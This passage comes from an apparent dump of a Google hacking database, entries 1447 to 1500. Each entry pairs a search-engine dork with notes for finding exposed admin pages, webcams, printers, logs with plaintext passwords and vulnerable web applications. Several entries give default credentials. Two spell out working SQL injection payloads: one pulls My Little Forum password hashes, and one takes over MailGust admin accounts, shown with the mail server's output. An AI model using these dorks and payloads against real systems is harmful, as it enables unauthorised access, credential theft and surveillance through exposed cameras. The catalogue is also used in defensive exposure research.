The above string lets you find weak passwords, which are encrypted but can be decrypted by a free tool called GetPass, provided by boson.com<br> [descr]] [[url]http://www.google.com/search?q=intext:%22enable+password+7%22[url]] [[dork]intext:"enable password 7"[dork]] [end][1447]] [[start][1448] [[title]"Copyright 2004 © Digital Scribe v.1.4"[title]] [[descr]Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution<br> <br> software site: http://www.digital-scribe.org/<br> <br> description: "Teachers have full control through a web-based interface. Designed<br> for easy installation and even easier use, the Digital Scribe has been used in thousands of schools. No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system.<br> <br> rgod<br> site: http://rgod.altervista.org<br> email: retrogod at aliceposta it[descr]] [[url]http://www.google.com/search?q=%22Copyright+2004+%C2%A9+Digital+Scribe+v.1.4%22&hl=it&lr=&c2coff=1&filter=0[url]] [[dork]"Copyright 2004 © Digital Scribe v.1.4"[dork]] [end][1448]] [[start][1449] [[title]"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos[[title]] [[descr]IMchaos link tracker admin pages. Reveals AIM screennames, IP ADDRESSES AND OTHER INFO via the details link. Logs can also be viewed and deleted from this page.[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=%22you+can+now+password%22+%7C+%22this+is+a+special+page+only+seen+by+you.+your+profile+visitors%22++inurl%3Aimchaos[url]] [[dork]"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos[dork]] [end][1449]] [[start][1450] [[title]XOOPS Custom Installation[[title]] [[descr]XOOPS custom installation wizards allow users to modify installation parameters. 
May also reveal sql username, password and table installations via pre-filled form data.[descr]] [[url]http://www.google.com/search?q=intitle:%22XOOPS+Custom+Installation%22&hl=en&lr=&c2coff=1&start=20&sa=N[url]] [[dork]intitle:"XOOPS Custom Installation"[dork]] [end][1450]] [[start][1451] [[title]intitle:"netbotz appliance" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces[[title]] [[descr]Netbotz devices are made to monitor video, temperature, electricity and door access in server rooms. These systems usually have multiple cameras. The information by itself might not be very dangerous, but someone could use it to plan physical entrance to a server room. This is not good information to have publicly available.[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3A%22netbotz+appliance%22+-inurl%3A.php+-inurl%3A.asp+-inurl%3A.pdf+-inurl%3Asecuritypipeline+-announces[url]] [[dork]intitle:"netbotz appliance" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces[dork]] [end][1451]] [[start][1452] [[title]"Powered by PHP Advanced Transfer Manager"[title]] [[descr]PHP Advanced Transfer Manager v1.30 underlying system disclosure / remote command execution / cross site scripting<br> <br> rgod<br> site: http://rgod.altervista.org<br> mail: retrogod at aliceposta it<br> [descr]] [[url]http://www.google.com/search?q=%22Powered+by+PHP+Advanced+Transfer+Manager+v1.30%22[url]] [[dork]"Powered by PHP Advanced Transfer Manager v1.30"[dork]] [end][1452]] [[start][1453] [[title]"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin[[title]] [[descr]This reveals admin site for Argo Software Design Mail Server.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&as_qdr=all&q=%22Welcome+to+Administration%22+%22General%22+%22Local+Domains%22+%22SMTP+Authentication%22+inurl%3Aadmin&btnG=Search[url]] [[dork]"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" 
inurl:admin[dork]] [end][1453]] [[start][1454] [[title]"Powered by CuteNews"[title]] [[descr]CuteNews 1.4.0 (possibly prior versions) remote code execution<br> <br> software site: http://cutephp.com/<br> <br> description: "Cute news is a powerful and easy for using news management <br> system that use flat files to store its database. It supports comments, archives, <br> search function, image uploading, backup function, IP banning, flood protection ..."<br> <br> rgod<br> site: http://rgod.altervista.org<br> mail: retrogod [at] aliceposta it[descr]] [[url]http://www.google.com/search?&q=%22powered+by+cutenews+1.4.%22[url]] [[dork]"powered by cutenews 1.4."[dork]] [end][1454]] [[start][1455] [[title]intitle:rapidshare intext:login[[title]] [[descr]Rapidshare login passwords.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1455]] [[start][1456] [[title]intitle:"PHProjekt - login" login password[[title]] [[descr]PHProjekt is group management software for online calendars, chat, forums, etc. I looked around and I think the default admin login/pass is root/root. Results 1 - 23 of about 851 when I posted this[descr]] [[url]http://www.google.com/search?q=intitle:%22PHProjekt+-+login%22+login+password&num=100[url]] [[dork]intitle:"PHProjekt - login" login password[dork]] [end][1456]] [[start][1457] [[title]Phaser numrange:100-100000 Name DNS IP "More Printers" index help filetype:html | filetype:shtml[[title]] [[descr]This is a search for various Phaser network printers. 
With this search you can look for printers to print test/help pages, monitor the printer, and generally mess with people.[descr]] [[url]http://www.google.com/search?hl=en&q=Phaser+numrange%3A100-100000+Name+DNS+IP+%22More+Printers%22+index+help+filetype%3Ahtml+%7C+filetype%3Ashtml[url]] [[dork]Phaser numrange:100-100000 Name DNS IP "More Printers" index help filetype:html | filetype:shtml[dork]] [end][1457]] [[start][1458] [[title]intitle:"Orite IC301" | intitle:"ORITE Audio IP-Camera IC-301" -the -a[[title]] [[descr]This search finds Orite 301 netcams with audio capabilities. [descr]] [[url]http://www.google.com/search?q=intitle:%22Orite+IC301%22+%7C+intitle:%22ORITE+Audio+IP-Camera+IC-301%22+-the+-a&num=100&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"Orite IC301" | intitle:"ORITE Audio IP-Camera IC-301" -the -a[dork]] [end][1458]] [[start][1459] [[title]"Powered by GTChat 0.95"+"User Login"+"Remember my login information"[title]] [[descr]There is an (adduser) remote denial of service vulnerability in version 0.95[descr]] [[url]http://www.google.com/search?q=%22Powered+by+GTChat+0.95%22%2B%22User+Login%22%2B%22Remember+my+login+information%22[url]] [[dork]"Powered by GTChat 0.95"+"User Login"+"Remember my login information"[dork]] [end][1459]] [[start][1460] [[title]intitle:"WEB//NEWS Personal Newsmanagement" intext:"© 2002-2004 by Christian Scheb - Stylemotion.de"[[title]] [[descr]WEB//NEWS 1.4 is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. 
[descr]] [[url]http://www.google.com/search?q=intitle:%22WEB//NEWS+Personal+Newsmanagement%22+intext:%22%C2%A9+2002-2004+by+Christian+Scheb+-+Stylemotion.de%22[url]] [[dork]intitle:"WEB//NEWS Personal Newsmanagement" intext:"© 2002-2004 by Christian Scheb - Stylemotion.de"[dork]] [end][1460]] [[start][1461] [[title]inurl:/modcp/ intext:Moderator+vBulletin[[title]] [[descr]There have been several dorks for vBulletin, but I could not find one in the search that targets the moderators' control panel login page - this search targets versions 3.0 onwards. 
[descr]] [[url]http://www.google.com/search?q=inurl:/modcp/+intext:Moderator%2BvBulletin&hl=en&lr=&c2coff=1&safe=off&start=0&sa=N[url]] [[dork]inurl:/modcp/ intext:Moderator+vBulletin[dork]] [end][1461]] [[start][1462] [[title]intitle:"i-secure v1.1" -edu[[title]] [[descr]I-Secure Login Pages[descr]] [[url]http://www.google.com/search?q=intitle:%22i-secure+v1.1%22+-edu&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"i-secure v1.1" -edu[dork]] [end][1462]] [[start][1463] [[title]intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=[[title]] [[descr]Aimoo Login Pages. "Looking for a free message board solution? Aimoo provides one of the most powerful, feature rich, community based forum services available!"<br> [descr]] [[url]http://www.google.com/search?q=intitle:%22Login+to+the+forums+-+%40www.aimoo.com%22+inurl:login.cfm%3Fid%3D&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=[dork]] [end][1463]] [[start][1464] [[title]intitle:"Login Forum Powered By AnyBoard" intitle:"If you are a new user:" intext:"Forum Powered By AnyBoard" inurl:gochat -edu[[title]] [[descr]Anyboard Login Portals. In addition,<br> A vulnerability has been reported in Netbula Anyboard 9.x "that may allow a remote attacker to gain access to sensitive data. This problem is due to an information disclosure issue that can be triggered by an attacker sending specific HTTP requests to a vulnerable host. 
This will result in sensitive information about the system being revealed to the attacker."[descr]] [[url]http://www.google.com/search?num=100&q=intitle%3A%22Login+Forum+Powered+By+AnyBoard%22+intitle%3A%22If+you+are+a+new+user%22+intext%3A%22Forum+Powered+By+AnyBoard%22+inurl%3Agochat+-edu[url]] [[dork]intitle:"Login Forum Powered By AnyBoard" intitle:"If you are a new user" intext:"Forum Powered By AnyBoard" inurl:gochat -edu[dork]] [end][1464]] [[start][1465] [[title]"Mimicboard2 086"+"2000 Nobutaka Makino"+"password"+"message" inurl:page=1[[title]] [[descr]Mimicboard2 is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=%22Mimicboard2+086%22%2B%222000+Nobutaka+Makino%22%2B%22password%22%2B%22message%22+inurl%3Apage%3D1&btnG=Search[url]] [[dork]"Mimicboard2 086"+"2000 Nobutaka Makino"+"password"+"message" inurl:page=1[dork]] [end][1465]] [[start][1466] [[title]"your password is" filetype:log[[title]] [[descr]This search finds log files containing the phrase (Your password is). These files often contain plaintext passwords, although YMMV.[descr]] [[url]http://www.google.com/search?hl=en&q=%22your+password+is%22+filetype%3Alog[url]] [[dork]"your password is" filetype:log[dork]] [end][1466]] [[start][1467] [[title] "admin account info" filetype:log[[title]] [[descr]Searches for logs containing admin server account information such as username and password.[descr]] [[url]http://www.google.com/search?q=+%22admin+account+info%22+filetype%3Alog[url]] [[dork] "admin account info" filetype:log[dork]] [end][1467]] [[start][1468] [[title]"Warning: Supplied argument is not a valid File-Handle resource in"[title]] [[descr]This error message can reveal path information. 
This message (like other error messages) is often posted to help forums, although the message still reveals path info in this form. Consider using the site: operator to narrow search.[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=%22Warning%3A+Supplied+argument+is+not+a+valid+File-Handle+resource+in%22+[url]] [[dork]"Warning: Supplied argument is not a valid File-Handle resource in" [dork]] [end][1468]] [[start][1469] [[title]"Maintained with Subscribe Me 2.044.09p"+"Professional" inurl:"s.pl"[title]] [[descr]Subscribe Me Pro 2.0.44.09p is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. <br> <br> Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.<br> <br> http://www.securityfocus.com/bid/14817/exploit[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=%22Maintained+with+Subscribe+Me+2.044.09p%22%2B%22Professional%22+inurl%3A%22s.pl%22+[url]] [[dork]"Maintained with Subscribe Me 2.044.09p"+"Professional" inurl:"s.pl" [dork]] [end][1469]] [[start][1470] [[title]"Warning:" "SAFE MODE Restriction in effect." "The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"[title]] [[descr]This error message reveals full path information. Recommend use of site: operator to narrow searches.<br> [descr]] [[url]http://www.google.com/search?num=100&hl=en&q=%22Warning%3A%22+%22SAFE+MODE+Restriction+in+effect.%22+%22The+script+whose+uid+is%22+%22is+not+allowed+to+access+owned+by+uid+0+in%22+%22on+line%22[url]] [[dork]"Warning:" "SAFE MODE Restriction in effect." 
"The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"[dork]] [end][1470]] [[start][1471] [[title]intitle:"Admin Login" "admin login" "blogware"[title]] [[descr]Blogware Login Portal: "An exciting and innovative tool for creating or enhancing your web presence. It is your key to easy publishing on the World Wide Web – share pictures, video, links, documents, newsletters, opinions and more, with family, friends and colleagues. Now you can have a website without being a Webmaster. It’s simple! There is no HTML to learn and no new software to download and install."[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22Admin+Login%22+%22admin+login%22+%22blogware%22+-site%3Ablogware.com+-filetype%3Ahtml[url]] [[dork]intitle:"Admin Login" "admin login" "blogware" -site:blogware.com -filetype:html[dork]] [end][1471]] [[start][1472] [[title]intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login[[title]] [[descr]net2ftp is a web-based FTP client written in PHP. Let's explain this in detail. 
Web-based means that net2ftp runs on a web server, and that you use a browser (for example Internet Explorer or Mozilla)[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22net2ftp%22+%22powered+by+net2ftp%22+inurl%3Aftp+OR+intext%3Alogin+OR+inurl%3Alogin[url]] [[dork]intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login[dork]] [end][1472]] [[start][1473] [[title]inurl:cartwiz/store/index.asp[[title]] [[descr]The CartWIZ eCommerce Shopping Cart System will help you build your online store through an interactive web-based e-commerce administration interface.<br> <br> There are multiple SQL injection and XSS vulnerabilities in the CartWIZ ASP cart.<br> <br> http://neworder.box.sk/explread.php?newsid=13534[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=inurl%3Acartwiz%2Fstore%2Findex.asp[url]] [[dork]inurl:cartwiz/store/index.asp[dork]] [end][1473]] [[start][1474] [[title]intitle:"Control panel" "Control Panel Login" ArticleLive inurl:admin -demo[[title]] [[descr]Build, manage and customize your own search engine friendly news / article site from scratch -- with absolutely no technical experience.<br> <br> Authentication bypass, SQL injections and XSS in ArticleLive 2005<br> <br> http://neworder.box.sk/explread.php?newsid=13582[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22Control+panel%22+%22Control+Panel+Login%22+ArticleLive+inurl%3Aadmin+-demo&filter=0[url]] [[dork]intitle:"Control panel" "Control Panel Login" ArticleLive inurl:admin -demo[dork]] [end][1474]] [[start][1475] [[title]"Powered by autolinks pro 2.1" inurl:register.php[[title]] [[descr]AutoLinksPro is a linking solution. 
AutoLinksPro link exchange software was built for the search engines to help improve your search engine rankings, traffic, and sales.<br> <br> Remote PHP File Include Vulnerability<br> http://www.securityfocus.com/archive/1/409529/30/120/threaded [descr]] [[url]http://www.google.com/search?num=100&hl=en&q=%22Powered+by+autolinks+pro+2.1%22+inurl%3Aregister.php[url]] [[dork]"Powered by autolinks pro 2.1" inurl:register.php[dork]] [end][1475]] [[start][1476] [[title]"CosmoShop by Zaunz Publishing" inurl:"cgi-bin/cosmoshop/lshop.cgi" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*[[title]] [[descr]CosmoShop is a commercial shop system written as a CGI.<br> <br> vulnerabilities:<br> SQL injection, passwords saved in cleartext, view any file<br> http://www.securityfocus.com/archive/1/409510/30/120/threaded[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=%22CosmoShop+by+Zaunz+Publishing%22+inurl%3A%22cgi-bin%2Fcosmoshop%2Flshop.cgi%22+-johnny.ihackstuff.com+-V8.10.106+-V8.10.100+-V.8.10.85+-V8.10.108+-V8.11*[url]] [[dork]"CosmoShop by Zaunz Publishing" inurl:"cgi-bin/cosmoshop/lshop.cgi" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*[dork]] [end][1476]] [[start][1477] [[title]openbb "powered by open bulletin board " -1.0-6 -1.0-7 -1.0-8 -vulnerable[[title]] [[descr]Open Bulletin Board is an open source discussion software package.<br> <br> SQL Injection Exploit:<br> http://www.governmentsecurity.org/forum/index.php?showtopic=15610&pid=121577&st=0&#entry121577[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=openbb+%22powered+by+open+bulletin+board+%22+-1.0-6+-1.0-7+-1.0-8+-vulnerable[url]] [[dork]openbb "powered by open bulletin board " -1.0-6 -1.0-7 -1.0-8 -vulnerable[dork]] [end][1477]] [[start][1478] [[title]"Powered by Woltlab Burning Board" -"2.3.3" -"v2.3.3" -"v2.3.2" -"2.3.2"[title]] [[descr]It's an exact replica of vBulletin but it is free.<br> <br> SQL-Injection Exploit:<br> 
http://www.governmentsecurity.org/archive/t14850.html[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=%22Powered+by+Woltlab+Burning+Board%22+-%222.3.3%22+-%22v2.3.3%22+-%22v2.3.2%22+-%222.3.2%22[url]] [[dork]"Powered by Woltlab Burning Board" -"2.3.3" -"v2.3.3" -"v2.3.2" -"2.3.2"[dork]] [end][1478]] [[start][1479] [[title]"Please login with admin pass" -"leak" -sourceforge[[title]] [[descr]PHPsFTPd is a web-based administration and configuration interface for the SlimFTPd FTP server. It can be used on any HTTP server that supports PHP and does not need a database or additional PHP modules, only SlimFTPd. It allows the administrators of the FTP server to configure it from within this interface as opposed to its native ASCII conf file. It shows statistics about the users that accessed the server, the files that were downloaded, server breakdowns, etc.<br> <br> Admin password leak:<br> http://cert.uni-stuttgart.de/archive/bugtraq/2005/07/msg00209.html[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=%22Please+login+with+admin+pass%22+-%22leak%22+-sourceforge[url]] [[dork]"Please login with admin pass" -"leak" -sourceforge[dork]] [end][1479]] [[start][1480] [[title]intitle:"PHP TopSites FREE Remote Admin"[title]] [[descr]PHP TopSites is a PHP/MySQL-based customizable TopList script. 
Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.<br> <br> PHP TopSites Discloses Configuration Data to Remote Users:<br> http://www.securitytracker.com/alerts/2005/Jul/1014552.html<br> <br> PS: all versions are vulnerable at time of writing.[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22PHP+TopSites+FREE+Remote+Admin%22[url]] [[dork]intitle:"PHP TopSites FREE Remote Admin"[dork]] [end][1480]] [[start][1481] [[title]intitle:"iDevAffiliate - admin" -demo[[title]] [[descr]Affiliate Tracking Software <br> Adding affiliate tracking software to your site is one of the most effective ways to achieve more <br> sales and more traffic! Our affiliate software installs in just minutes and integrates easily into<br> your existing website.[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22iDevAffiliate+-+admin%22+-demo[url]] [[dork]intitle:"iDevAffiliate - admin" -demo[dork]] [end][1481]] [[start][1482] [[title]"powered by my little forum"[title]] [[descr]My Little Forum 1.5 / 1.6beta SQL Injection<br> <br> software:<br> site: http://www.mylittlehomepage.net/my_little_forum<br> software: "A simple web-forum that supports classical thread view (message tree)<br> as well as messageboard view to display the messages.<br> Requires PHP > 4.1 and a MySQL database."<br> <br> <br> 1) look at the vulnerable code at line 144 inside search.php:<br> ...<br> $result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL ".<br> $time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,<br> DATE_FORMAT(time + INTERVAL ".$time_difference." 
HOUR, '".$lang['time_format']."')<br> AS Datum, subject, name, email, hp, place, text, category FROM ".$forum_table."<br> WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "<br> .$settings['search_results_per_page'], $connid);<br> ...<br> <br> now go to the search page, select "phrase", and type:<br> <br> [whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,<br> user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where<br> user_name='[username]' /*<br> <br> if magic quotes are off you will have (guess?...) any admin/user password hash<br> 'cause the $search_string var is not filtered...<br> <br> you can find my PoC exploit here:<br> <br> http://rgod.altervista.org/mylittle15_16b.html<br> <br> <br> 2) 1.6beta is vulnerable too, we have:<br> ...<br> $result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL ".$time_difference." HOUR) AS<br> Uhrzeit, subject, name, email, hp, place, text, category FROM ".$db_settings['forum_table']."<br> WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", ".$settings['search_results_per_page'],<br> $connid);<br> ...<br> <br> you get the same results by deleting one element from the injection string:<br> <br> [whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,<br> user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where<br> user_name='[username]' /*[descr]] [[url]http://www.google.com/search?hl=it&q=%22powered+by+my+little+forum%22&btnG=Cerca&meta=[url]] [[dork]"powered by my little forum"[dork]] [end][1482]] [[start][1483] [[title]"powered by mailgust"[title]] [[descr]MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takeover<br> <br> software:<br> site: http://www.mailgust.org/<br> description:<br> Mailgust is three pieces of software in one: <br> * Mailing list manager <br> * Newsletter distribution tool <br> * Message Board <br> Mailgust is written in PHP and uses a MySQL database. 
<br> <br> vulnerability:<br> <br> if magic quotes off -> SQL Injection<br> without having an account, a user can send himself a new admin password using the<br> password reminder; in the email field type:<br> <br> [your_email],'or'a'='a'/*@hotmail.com<br> <br> take a look at what happens:<br> <br> 220 [MAILSERVER] SMTP Service ready<br> HELO [MAILGUST]<br> 250 [MAILSERVER].<br> MAIL FROM:<me@localhost.com><br> 250 MAIL FROM:<me@localhost.com> OK<br> RCPT TO:<[your_email]><br> 250 RCPT TO:>[your_email] OK<br> RCPT TO:<'or'a'='a'/*@hotmail.com><br> 250 RCPT TO:<'or'a'='a'/*@hotmail.com> OK<br> DATA<br> 354 Start mail input; end with <CRLF>.<CRLF><br> Date: Sat, 24 Sep 2005 16:11:38 +0100<br> Subject: New password<br> To: [your_email],'or'a'='a'/*@hotmail.com<br> From: systemxxx@localhost.com<br> Your login name is: [admin_email]<br> Your new password is: 4993587<br> Click here:<br> http://localhost/mailgust/index.php?method=activate_new_password&list=maillistuser&pwd=4993587&id=1756185114<br> to activate the password, then try to log in!<br> <br> It is recommended that you change your password afterwards.<br> .<br> 250 <4335105B00009AE2> Mail accepted<br> QUIT<br> 221 [MAILSERVER] QUIT<br> <br> the vulnerable query is in [path_to_mailgust]/gorum/user_email.php at line 363:<br> ...<br> $query = "SELECT * FROM $applName"."_$userClassName ".<br> "WHERE email='$this->email'";<br> ...<br> <br> it becomes:<br> <br> SELECT * FROM maillist_maillistuser WHERE email='[your_email],'or'a'='a'/*@hotmail.com'<br> <br> "or'a'='a'" is always true, so the query is always true, <br> the script doesn't fail; for the mail function, these are two valid email addresses,<br> so it will send the mail to [your_email] and to 'or'a'='a'/*@hotmail.com ;)<br> <br> activate the password, now you can log in with [admin_email] as user and the new password<br> <br> you can find my PoC exploit 
here:<br> <br> http://rgod.altervista.org/maildisgust.html<br> <br> [descr]] [[url]http://www.google.com/search?hl=it&q=%22powered+by+mailgust%22&btnG=Cerca+con+Google&meta=[url]] [[dork]"powered by mailgust"[dork]] [end][1483]] [[start][1484] [[title]intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder[[title]] [[descr]Directory listing for Fastream NETFile Web Server[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Folder+Listing%22+%22Folder+Listing%22+Name+Size+Date%2FTime+File+Folder[url]] [[dork]intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder[dork]] [end][1484]] [[start][1485] [[title]"Directory Listing for" "Hosted by Xerver"[title]] [[descr]Directory listing for Xerver web server[descr]] [[url]http://www.google.com/search?q=%22Directory+Listing+for%22+%22Hosted+by+Xerver%22[url]] [[dork]"Directory Listing for" "Hosted by Xerver"[dork]] [end][1485]] [[start][1486] [[title]intitle:"Supero Doctor III" -inurl:supermicro[[title]] [[descr]"Supero Doctor III Remote Management" by Supermicro, Inc.<br> <br> info: http://www.supermicro.es/products/accessories/software/SuperODoctorIII.html<br> <br> just look for the default password...[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Supero+Doctor+III%22+-inurl%3Asupermicro[url]] [[dork]intitle:"Supero Doctor III" -inurl:supermicro[dork]] [end][1486]] [[start][1487] [[title]intitle:"Netcam" intitle:"user login"[title]] [[descr]Just yet another online cam.[descr]] [[url]http://www.google.com/search?q=intitle:%22Netcam%22+intitle:%22user+login%22&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"Netcam" intitle:"user login"[dork]] [end][1487]] [[start][1488] [[title]Powered by PHP-Fusion v6.00.109 © 2003-2005. -php-fusion.co.uk[[title]] [[descr]this is the dork: <br> <br> Powered by PHP-Fusion v6.00.109 © 2003-2005. 
-php-fusion.co.uk<br> <br> as it is, without quotes, for the version I tested, prone to<br> SQL Injection / administrative credentials disclosure<br> <br> this is my advisory/PoC exploit: <br> <br> http://rgod.altervista.org/phpfusion600109.html <br> [descr]] [[url]http://www.google.com/search?q=Powered+by+PHP-Fusion+v6.00.109+%C2%A9+2003-2005.+-php-fusion.co.uk[url]] [[dork]Powered by PHP-Fusion v6.00.109 © 2003-2005. -php-fusion.co.uk[dork]] [end][1488]] [[start][1489] [[title]inurl:/yabb/Members/Admin.dat[[title]] [[descr]This search will show you the Administrator password (very first line) on YaBB forums whose owners didn't configure the permissions correctly. Go up a directory to get a full member list (the .dat files have the passwords).<br> [descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%2Fyabb%2FMembers%2FAdmin.dat[url]] [[dork]inurl:/yabb/Members/Admin.dat[dork]] [end][1489]] [[start][1491] [[title]intitle:"Biromsoft WebCam" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000[[title]] [[descr]Biromsoft webcam software enables anyone with a webcam to easily create a webcam HTTP server. This googledork looks for these webcam servers.[descr]] [[url]http://www.google.com/search?q=intitle:%22Biromsoft+WebCam%22+-4.0+-serial+-ask+-crack+-software+-a+-the+-build+-download+-v4+-3.01+-numrange:1-10000&num=100&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"Biromsoft WebCam" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000[dork]] [end][1491]] [[start][1492] [[title](intitle:"VisionGS Webcam Software")|(intext:"Powered by VisionGS Webcam") -showthread.php -showpost.php -"Search Engine" -computersglobal.com -site:g[[title]] [[descr]I don't know if the Google query got submitted right because it looks truncated. 
here it is again:<br> (intitle:"VisionGS Webcam Software")|(intext:"Powered by VisionGS Webcam") -showthread.php -showpost.php -"Search Engine" -computersglobal.com -site:golb.org -site:chat.ru -site:findlastminute.de -site:tricus.de -site:urlaubus.de -johnny.ihackstuff <br> <br> VisionGS webcam software enables anyone with a webcam to easily host a webcam HTTP server. This dork finds those servers.[descr]] [[url]http://www.google.com/search?q=%28intitle%3A%22VisionGS+Webcam+Software%22%29%7C%28intext%3A%22Powered+by+VisionGS+Webcam%22%29+-showthread.php+-showpost.php+-%22Search+Engine%22+-computersglobal.com+-site%3Agolb.org+-site%3Achat.ru+-site%3Afindlas[url]] [[dork](intitle:"VisionGS Webcam Software")|(intext:"Powered by VisionGS Webcam") -showthread.php -showpost.php -"Search Engine" -computersglobal.com -site:golb.org -site:chat.ru -site:findlas[dork]] [end][1492]] [[start][1493] [[title]"Powered By: lucidCMS 1.0.11"[title]] [[descr]Lucid CMS 1.0.11 SQL Injection / Login bypass<br> <br> this is the dork for the version I tested:<br> "Powered By: lucidCMS 1.0.11"<br> <br> advisory/PoC exploit:<br> <br> http://rgod.altervista.org/lucidcms1011.html<br> <br> we have an XSS too:<br> <br> http://packetstorm.linuxsecurity.com/0509-exploits/lucidCMS.txt[descr]] [[url]http://www.google.com/search?q=%22Powered+By%3A+lucidCMS+1.0.11%22[url]] [[dork]"Powered By: lucidCMS 1.0.11"[dork]] [end][1493]] [[start][1495] [[title]inurl:login.jsp.bak[[title]] [[descr]JSP programmer anyone? You can read this![descr]] [[url]http://www.google.com/search?q=inurl:login.jsp.bak[url]] [[dork]inurl:login.jsp.bak[dork]] [end][1495]] [[start][1496] [[title]intitle:Mantis "Welcome to the bugtracker" "0.15 | 0.16 | 0.17 | 0.18"[title]] [[descr]Cross site scripting and SQL injection vulnerabilities were discovered in Mantis versions 0.19.2 or less. Mantis is a web-based bugtracking system written in PHP. 
<br> <br> Vulnerability report at<br> http://search.securityfocus.com/archive/1/411591/30/0/threaded[descr]] [[url]http://www.google.com/search?q=intitle%3AMantis+%22Welcome+to+the+bugtracker%22+%220.15+%7C+0.16+%7C+0.17+%7C+0.18%22[url]] [[dork]intitle:Mantis "Welcome to the bugtracker" "0.15 | 0.16 | 0.17 | 0.18"[dork]] [end][1496]] [[start][1497] [[title]intitle:"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603" intitle:"Live Images"[title]] [[descr]This is a googledork for IQeye netcams. For some of them you can control how they tilt/zoom. The default admin username/password are root/system.[descr]] [[url]http://www.google.com/search?q=intitle:%22IQeye302+%7C+IQeye303+%7C+IQeye601+%7C+IQeye602+%7C+IQeye603%22+intitle:%22Live+Images%22&num=100&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603" intitle:"Live Images"[dork]] [end][1497]] [[start][1499] [[title]intitle:"urchin (5|3|admin)" ext:cgi[[title]] [[descr]Gain access to Urchin analysis reports. [descr]] [[url]http://www.google.com/search?q=intitle%3A%22urchin+%285%7C3%7Cadmin%29%22+ext%3Acgi[url]] [[dork]intitle:"urchin (5|3|admin)" ext:cgi[dork]] [end][1499]] [[start][1500] [[title]inurl:status.cgi?host=all[[title]] [[descr]Nagios Status page. 
